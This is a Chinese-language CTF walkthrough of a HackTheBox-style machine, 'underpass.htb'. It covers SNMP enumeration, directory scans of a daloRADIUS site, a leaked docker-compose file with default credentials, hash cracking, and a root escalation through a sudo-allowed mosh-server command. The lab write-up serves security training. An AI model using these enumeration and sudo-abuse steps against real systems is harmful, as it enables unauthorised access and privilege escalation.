fscan只扫出22 80 110端口
学到一个新的信息搜集的新招
snmpwalk 命令从目标主机 underpass.htb 获取的管理信息库 (MIB) 数据
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 ┌──(root㉿kali)-[~] └─ Created directory: /var/lib/snmp/cert_indexes iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64" iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10 iso.3.6.1.2.1.1.3.0 = Timeticks: (11947193) 1 day, 9:11:11.93 iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb" iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!" iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas" iso.3.6.1.2.1.1.7.0 = INTEGER: 72 iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1 iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1 iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1 iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1 iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1 iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49 iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50 iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4 iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3 iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92 iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB." iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching." iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model." iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities" iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP." iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations" iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations" iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations" iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering." iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications." iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01 iso.3.6.1.2.1.25.1.1.0 = Timeticks: (11948492) 1 day, 9:11:24.92 iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 03 17 04 35 2C 00 2B 00 00 iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216 iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0 " iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0 iso.3.6.1.2.1.25.1.6.0 = Gauge32: 217 iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0 End of MIB
得知该服务器运行了daloRADIUS
查询得知目录结构一般为/daloradius/…
进一步目录扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 E:\小工具\ONE -FOX 集成工具箱_V8 公开版_by 狐狸\gui_scan \dirsearch >python dirsearch.py -u http ://underpass.htb /daloradius / _ |. _ _ _ _ _ _ |_ v0 .4.3 by 鹏组安全 (_ ||| _ ) (/_ (_ || (_ | ) Extensions : php , aspx , jsp , html , js | HTTP method : GET | Threads : 25 | Wordlist size : 11714Output File : E :\小工具\ONE -FOX 集成工具箱_V8 公开版_by 狐狸\gui_scan \dirsearch \reports \http_underpass.htb \_daloradius__25 -03-23_13 -16-04.txt Target : http ://underpass.htb /[13:16:04] Starting : daloradius / [13:16:09] 200 - 221B - /daloradius /.gitignore [13:16:31] 301 - 323B - /daloradius /app -> http ://underpass.htb /daloradius /app / [13:16:36] 200 - 24KB - /daloradius /ChangeLog [13:16:41] 301 - 323B - /daloradius /doc -> http ://underpass.htb /daloradius /doc / [13:16:41] 200 - 2KB - /daloradius /Dockerfile [13:16:41] 200 - 2KB - /daloradius /docker -compose.yml [13:16:52] 301 - 327B - /daloradius /library -> http ://underpass.htb /daloradius /library / [13:16:52] 200 - 18KB - /daloradius /LICENSE [13:17:05] 200 - 10KB - /daloradius /README.md [13:17:13] 301 - 325B - /daloradius /setup -> http ://underpass.htb /daloradius /setup / Task Completed E :\小工具\ONE -FOX 集成工具箱_V8 公开版_by 狐狸\gui_scan \dirsearch >python dirsearch.py -u http ://underpass.htb /daloradius /app _ |. _ _ _ _ _ _ |_ v0 .4.3 by 鹏组安全 (_ ||| _ ) (/_ (_ || (_ | ) Extensions : php , aspx , jsp , html , js | HTTP method : GET | Threads : 25 | Wordlist size : 11714Output File : E :\小工具\ONE -FOX 集成工具箱_V8 公开版_by 狐狸\gui_scan \dirsearch \reports \http_underpass.htb \_daloradius_app_25 -03-23_13 -38-16.txt Target : http ://underpass.htb /[13:38:16] Starting : daloradius /app / [13:40:08] 301 - 330B - /daloradius /app /common -> http ://underpass.htb /daloradius /app /common / [13:42:30] 301 - 329B - /daloradius /app /users -> http ://underpass.htb /daloradius /app /users / [13:42:30] 200 - 2KB - /daloradius /app /users /login.php [13:42:30] 302 - 0B - /daloradius /app /users / -> home -main.php
但是进不去
继续翻看其他文件
underpass.htb/daloradius/docker-compose.yml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 version: "3" services: radius-mysql: image: mariadb:10 container_name: radius-mysql restart: unless-stopped environment: - MYSQL_DATABASE=radius - MYSQL_USER=radius - MYSQL_PASSWORD=radiusdbpw - MYSQL_ROOT_PASSWORD=radiusrootdbpw volumes: - "./data/mysql:/var/lib/mysql" radius: container_name: radius build: context: . dockerfile: Dockerfile-freeradius restart: unless-stopped depends_on: - radius-mysql ports: - '1812:1812/udp' - '1813:1813/udp' environment: - MYSQL_HOST=radius-mysql - MYSQL_PORT=3306 - MYSQL_DATABASE=radius - MYSQL_USER=radius - MYSQL_PASSWORD=radiusdbpw # Optional settings - DEFAULT_CLIENT_SECRET=testing123 volumes: - ./data/freeradius:/data # If you want to disable debug output, remove the command parameter command: -X radius-web: build: . container_name: radius-web restart: unless-stopped depends_on: - radius - radius-mysql ports: - '80:80' - '8000:8000' environment: - MYSQL_HOST=radius-mysql - MYSQL_PORT=3306 - MYSQL_DATABASE=radius - MYSQL_USER=radius - MYSQL_PASSWORD=radiusdbpw # Optional Settings: - DEFAULT_CLIENT_SECRET=testing123 - DEFAULT_FREERADIUS_SERVER=radius - MAIL_SMTPADDR=127.0.0.1 - MAIL_PORT=25 - MAIL_FROM=root@daloradius.xdsl.by - MAIL_AUTH= volumes: - ./data/daloradius:/data
underpass.htb/daloradius/doc/install/INSTALL
换dirbuster的字典重新扫一遍扫到operators目录
找到userlist
直接查和hashcat都行
进去拿到user
提权
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 svcMosh@underpass:~$ find / -perm -u=s -type f 2>/dev/null /usr/libexec/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/chsh /usr/bin/mount /usr/bin/fusermount3 /usr/bin/chfn /usr/bin/newgrp /usr/bin/sudo /usr/bin/passwd /usr/bin/su /usr/bin/gpasswd /usr/bin/umount svcMosh@underpass:~$ sudo -l Matching Defaults entries for svcMosh on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User svcMosh may run the following commands on localhost: (ALL) NOPASSWD: /usr/bin/mosh-server svcMosh@underpass:~$
执行看看
1 2 3 4 5 6 7 8 9 10 11 12 svcMosh@underpass:~$ /usr/bin/mosh-server MOSH CONNECT 60001 DiiNVEgq4M56rujxrqcQBA mosh-server (mosh 1.3.2) [build mosh 1.3.2] Copyright 2012 Keith Winstein <mosh-devel@mit.edu> License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. [mosh-server detached, pid = 1580]
启动一个mosh-server服务,大致也是客户端和服务端
通过–help查看连接命令
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 svcMosh@underpass:~$ mosh -h Usage: /usr/bin/mosh [options] [--] [user@]host [command ...] --client=PATH mosh client on local machine (default: "mosh-client" ) --server=COMMAND mosh server on remote machine (default: "mosh-server" ) --predict=adaptive local echo for slower links [default] -a --predict=always use local echo even on fast links -n --predict=never never use local echo --predict=experimental aggressively echo even when incorrect -4 --family=inet use IPv4 only -6 --family=inet6 use IPv6 only --family=auto autodetect network type for single-family hosts only --family=all try all network types --family=prefer-inet use all network types, but try IPv4 first [default] --family=prefer-inet6 use all network types, but try IPv6 first -p PORT[:PORT2] --port=PORT[:PORT2] server-side UDP port or range (No effect on server-side SSH port) --bind-server={ssh|any|IP} ask the server to reply from an IP address (default: "ssh" ) --ssh=COMMAND ssh command to run when setting up session (example: "ssh -p 2222" ) (default: "ssh" ) --no-ssh-pty do not allocate a pseudo tty on ssh connection --no-init do not send terminal initialization string --local run mosh-server locally without using ssh --experimental-remote-ip=(local |remote|proxy) select the method for discovering the remote IP address to use for mosh (default: "proxy" ) --help this message --version version and copyright information Please report bugs to mosh-devel@mit.edu. Mosh home page: https://mosh.org
直接
1 mosh --server="sudo /usr/bin/mosh-server" 127.0.0.1
直接弹出一个ssh登录选项 进入root
